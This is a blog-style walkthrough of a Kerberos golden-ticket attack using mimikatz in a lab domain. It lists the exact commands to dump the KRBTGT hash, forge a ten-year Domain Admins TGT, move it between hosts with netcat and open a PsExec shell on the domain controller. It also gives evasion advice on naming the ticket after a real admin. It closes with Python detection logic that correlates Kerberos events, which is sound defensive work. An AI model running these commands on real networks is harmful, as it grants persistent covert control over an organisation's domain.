Friday, December 1, 2017

Windows Credential Attack - Part 2

In my last post, I wrote about passing the hash using the standard mimikatz tool. For this installment, I will demonstrate how to pass the ticket (PTT) using the same tool, with a forged 'golden ticket'. A golden ticket is a Kerberos Ticket Granting Ticket (TGT) forged with the password hash of the KRBTGT account, the built-in Active Directory (AD) account whose key the Key Distribution Center (KDC) uses to encrypt and sign every TGT it issues; the KDC is an essential component of Microsoft's entire single sign-on ecosystem. Passing such a ticket has several advantages over passing the hash (PtH) as a backdoor into a Windows Domain Controller (DC). It is very difficult to remove, because it is tied to KRBTGT rather than to any user account: resetting the impersonated user's password will not remove it, and neither will reinstalling/promoting a new DC in the same domain, since the KRBTGT key is replicated to every DC. The only clean-up is resetting the KRBTGT password twice (the KDC keeps accepting tickets under the previous key until the second reset), which is why the name 'golden ticket' was given. mimikatz also forges it with 'Domain Admins' membership (plus Enterprise Admins and Schema Admins in its default group list) and a 10-year validity period by default!!! You virtually have full control of the domain/forest, allowing you to manipulate any object managed by the DC. Also, the user name you put in the ticket does not have to exist, so no account created by this technique shows up in the standard AD listing! You practically have God-like control over the entire enterprise domain!

In a nutshell, what I did was identify and dump the NTLM hash of the KRBTGT account, forge a malicious ticket for a made-up user 'hacker4' with the corresponding domain name and SID, save it to a file, transfer it to 'client-pc' using netcat and load it back into memory there (klist on client-pc then lists the injected ticket). I did a short video to demonstrate this simple technique using a Windows client PC (client-pc) and a Windows 2008 Domain Controller (server-dc). The tough job is obtaining SYSTEM privilege on server-dc to run mimikatz and dump the hash, which is out of scope of this post.

Summary of commands:

Steps on server-dc (inside mimikatz, running as SYSTEM)

privilege::debug                      (acquire SeDebugPrivilege)
lsadump::lsa /inject /name:krbtgt     (dump the KRBTGT NTLM hash; the output also shows the domain SID)
kerberos::golden /admin:hackerboy /domain:bubblegum.com /sid:S-1-5-21-4052271652-3634189325-3875401421 /krbtgt:409adfdd28b38f3decff6609fe0a19a1 
                                      (forge the TGT; without /ptt it is written to ticket.kirbi)
nc 10.0.0.234 1234 < ticket.kirbi     (send the ticket file to client-pc)

Steps on the client-pc

nc -nlpv 1234 > ticket.kirbi          (receive the ticket file)
kerberos::ptt ticket.kirbi            (inside mimikatz: inject the ticket into the current logon session)
psexec64 \\server-dc cmd.exe          (PsExec authenticates to the DC with the injected TGT)
whoami /groups                        (in the remote shell: confirm the Domain Admins membership)

P.O.C Recording (video embedded in the original post)

* Caveat: I recommend creating the golden ticket with the same name as an existing admin on the DC. PsExec64.exe can't seem to pass the ticket after a reboot when the user name in the ticket doesn't match a user that exists on the DC.

kerberos::golden /admin:administrator /domain:bubblegum.com /sid:xxxxx /krbtgt:xxxx
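From the defender's side, the procedure above leaves two traces on the DC that can be checked. The KDC never issued the forged TGT, so the service-ticket request PsExec triggers (event 4769) arrives from client-pc with no preceding TGT request (event 4768) for that user from that host; and, unless you follow the caveat and forge the ticket as an existing admin, the user name in the ticket is not in AD at all. The following Python is an added example written for this post, not code from the original or from mimikatz: the events, the directory snapshot and the 10.0.0.234 client address (reused from the netcat command above) are constructed, the event records are reduced to a few fields, and the heuristic assumes the default 10-hour TGT lifetime.

```python
"""Heuristic detection of forged (golden-ticket) TGT use from Windows
Security event records of a Domain Controller.

Two signals:
  1. A forged TGT is never issued by the KDC, so a service-ticket request
     (4769) from a client has no earlier TGT request (4768) for that user
     from that client within one TGT lifetime.
  2. The user name inside a golden ticket does not have to exist in AD.

All data below is constructed for the example.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class KerbEvent:
    """Subset of the fields the DC logs for 4768 (TGT requested) and
    4769 (service ticket requested)."""
    event_id: int
    time: datetime
    account: str        # TargetUserName, i.e. the name inside the ticket
    client_ip: str      # IpAddress of the requesting host
    service: str = ""   # ServiceName (4769 only)


# Constructed directory snapshot: the accounts that really exist in AD.
KNOWN_ACCOUNTS = {"administrator", "alice", "bob", "server-dc$", "client-pc$"}

# Assumed domain default: a TGT is valid for at most 10 hours, so a 4769
# that far from the last 4768 cannot be using a KDC-issued TGT.
TGT_LIFETIME = timedelta(hours=10)


def find_forged_tgt_use(events, known_accounts=KNOWN_ACCOUNTS, window=TGT_LIFETIME):
    """Return [(event, [reason, ...]), ...] for 4769 events that look like
    the use of a forged TGT. Events are processed in time order."""
    last_tgt = {}   # (account, client_ip) -> time of the last 4768
    findings = []
    for ev in sorted(events, key=lambda e: e.time):
        key = (ev.account.lower(), ev.client_ip)
        if ev.event_id == 4768:
            last_tgt[key] = ev.time
            continue
        if ev.event_id != 4769:
            continue
        reasons = []
        # Signal 2: the forged name is not an AD account.
        if ev.account.lower() not in known_accounts:
            reasons.append("account not present in AD")
        # Signal 1: no KDC-issued TGT for this user from this client.
        issued = last_tgt.get(key)
        if issued is None or ev.time - issued > window:
            reasons.append("no TGT request (4768) from this client in the window")
        if reasons:
            findings.append((ev, reasons))
    return findings


def sample_events():
    """Constructed log excerpt: one legitimate logon, then the two ways
    the post's ticket can appear (a made-up user, or the existing
    'administrator' name as the caveat recommends)."""
    t0 = datetime(2017, 12, 1, 9, 0, 0)
    return [
        KerbEvent(4768, t0, "alice", "10.0.0.50"),
        KerbEvent(4769, t0 + timedelta(minutes=5), "alice", "10.0.0.50", "cifs/server-dc"),
        KerbEvent(4769, t0 + timedelta(minutes=10), "hackerboy", "10.0.0.234", "cifs/server-dc"),
        KerbEvent(4769, t0 + timedelta(minutes=12), "administrator", "10.0.0.234", "cifs/server-dc"),
    ]


if __name__ == "__main__":
    for ev, reasons in find_forged_tgt_use(sample_events()):
        print(f"{ev.time:%H:%M} 4769 {ev.account}@{ev.client_ip} -> {ev.service}: "
              + "; ".join(reasons))
```

Run against the sample, the 'hackerboy' request is flagged for both reasons and the 'administrator' request for the missing 4768 only, which is the point of the caveat: naming the ticket after a real admin hides the unknown-account signal but not the missing-AS-exchange one. In production, ticket renewals (event 4770) and hosts that change IP address need to be folded into the correlation to keep false positives down.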

